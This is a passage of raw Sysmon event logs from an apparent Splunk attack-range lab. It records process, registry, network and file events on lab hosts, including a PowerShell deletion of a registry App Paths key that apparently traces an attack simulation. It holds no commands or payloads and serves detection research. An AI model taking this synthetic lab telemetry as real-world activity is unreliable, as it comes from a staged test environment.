Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D57DB42C97DEF2073CB746AB32F215CD,SHA256=15C6E15C12BF1C48D005C8345681FFDA0AAA583BD73C0B5F406ABED9DFF1AF28,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055115Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:50.909{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61987-false10.0.1.12-8089- 23542300x80000000000000001055114Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:58.655{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4E42725E3F6031426C1AB0B15CC61F9,SHA256=D2ACD8D37963A591D4556B32C1BD21720AE00FA1E58C8BCD77D478384FEC1113,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055113Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:58.255{466BC892-5A42-60E8-C510-00000000CF01}7816ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeC:\Users\bob\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\7816.xml~RFf78980c.TMPMD5=4553D3891EC8198EC956E59A7FA89664,SHA256=7DA31B28073EC76DCCA7EDFC3709014058FE36DCB6626D30538493EE344D57A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810593Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:59.728{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=591DD77F11D211553F533DCCF638DF06,SHA256=01867DE59A06DC36D9BF8E43C811DB07DD14059F7F73B0FBBBFAF1805CD00B5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055126Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:59.669{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02E8B81601664D7288C0553671A76015,SHA256=73C7A76AC4B2928FC30E8FCD0C02E6A5C7EE49DB238F98C4D8B328136FEAB3C1,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001055125Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:08:59.669{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001055124Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:08:59.669{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f789d9a) 13241300x80000000000000001055123Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:08:59.669{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776ec-0xc909f9ec) 13241300x80000000000000001055122Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:08:59.669{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f5-0x2ace61ec) 13241300x80000000000000001055121Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:08:59.669{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fd-0x8c92c9ec) 13241300x80000000000000001055120Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:08:59.669{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001055119Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:08:59.669{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f789d9a) 13241300x80000000000000001055118Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:08:59.669{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776ec-0xc909f9ec) 13241300x80000000000000001055117Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:08:59.669{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f5-0x2ace61ec) 13241300x80000000000000001055116Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:08:59.669{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fd-0x8c92c9ec) 10341000x80000000000000001055132Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:00.753{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001055131Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:00.753{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001055130Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:00.753{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f 10341000x80000000000000001055129Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:00.753{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 23542300x80000000000000001055128Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:00.753{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFf78a1d0.TMPMD5=FEEDDF0B48ACBAE2DF2C13E094BA61E1,SHA256=564E4AC53FEF38F8EC2ADC3773CA3AE2E546D9CF626CDED40CA8B8DCCA4D789B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055127Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:00.690{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7BE9B3A2C60D8A6760A9419D335365B,SHA256=EB83888B5467BFD94E37C49342C488D143E149BF7477F6E67C80EF0A0FA8887A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810595Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:00.791{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3419CC5C698C0CDB24B65648770D1100,SHA256=6E98BCF3532D2087E27C3DC7C4B7D06E2A34A56B5E8336C6FC018C7799CBB190,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810594Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:59.330{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57479-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810596Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:01.807{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D112873A7BD64D2EF21B2E54C1D9597,SHA256=29C41CDC4BED8124BD80B9A271B956FBB104FF4090CE7D6FB81446FB753CEF1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055137Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:01.710{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DE3A1CB27FD48ADEAC28F2C1D19527B,SHA256=91B7F530642A59FC641E481C0918527B8E4A7728ABC0D343B31D3E7D6A586928,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055136Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:53.864{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-64445-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 354300x80000000000000001055135Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:53.662{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61988-false10.0.1.12-8000- 23542300x80000000000000001055134Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:01.642{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EEAB2E5EDCF0EB0B2069AAF17079EEC3,SHA256=037DB6BFE7607BE899B5FCD090D997095278753904E7E648530F2385CF1750E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055133Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:01.642{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=80C0CC2E70230EAC6FD79A8CE9BFD900,SHA256=11823BE38E550300BD1BD61EB089EA7707F525A5299395B9BE045BD30EAA86B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810597Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:02.838{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B2E172C4D65F53FE0F159F945DEFCA3,SHA256=07EE48DAD43CEF0D2E3DF3D9A76B3F730E79CB62B4D0BF217E51428DE0A06224,IMPHASH=00000000000000000000000000000000falsetrue 12241200x80000000000000001055186Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteKey2021-07-12 08:09:02.973{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\control.exe 10341000x80000000000000001055185Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.757{466BC892-02AD-60E8-0B00-00000000CF01}624808C:\Windows\system32\lsass.exe{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055184Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.757{466BC892-02AD-60E8-0B00-00000000CF01}624808C:\Windows\system32\lsass.exe{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055183Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.757{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7571276F24270357AA93A118EC7D9B7,SHA256=376BCCB50A3C144A43880D68A81C04B02E1253F62869C05E391E5405A9AB8E80,IMPHASH=00000000000000000000000000000000falsetrue 17141700x80000000000000001055182Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:09:02.726{466BC892-F89E-60EB-077E-00000000CF01}3804\PSHost.132705509422478310.3804.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001055181Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.710{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8AA5773405E2C79BC294B733F53B8B22,SHA256=1A49FD066865B6EAD7312E4EB6DB983D7A51814DCB47F2FCECFD26805CAB9900,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055180Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.695{466BC892-F89E-60EB-077E-00000000CF01}3804ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_luqk1trn.feu.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055179Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.695{466BC892-F89E-60EB-077E-00000000CF01}3804ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_ykodwyjv.sv5.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001055178Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.657{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_ykodwyjv.sv5.ps12021-07-12 08:09:02.657 10341000x80000000000000001055177Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.626{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F89E-60EB-077E-00000000CF01}3804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055176Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.595{466BC892-F89E-60EB-077E-00000000CF01}38048736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055175Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.595{466BC892-F89E-60EB-077E-00000000CF01}38048736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055174Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.595{466BC892-F89E-60EB-077E-00000000CF01}38048736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055173Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:02.595{466BC892-F89E-60EB-077E-00000000CF01}38048736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0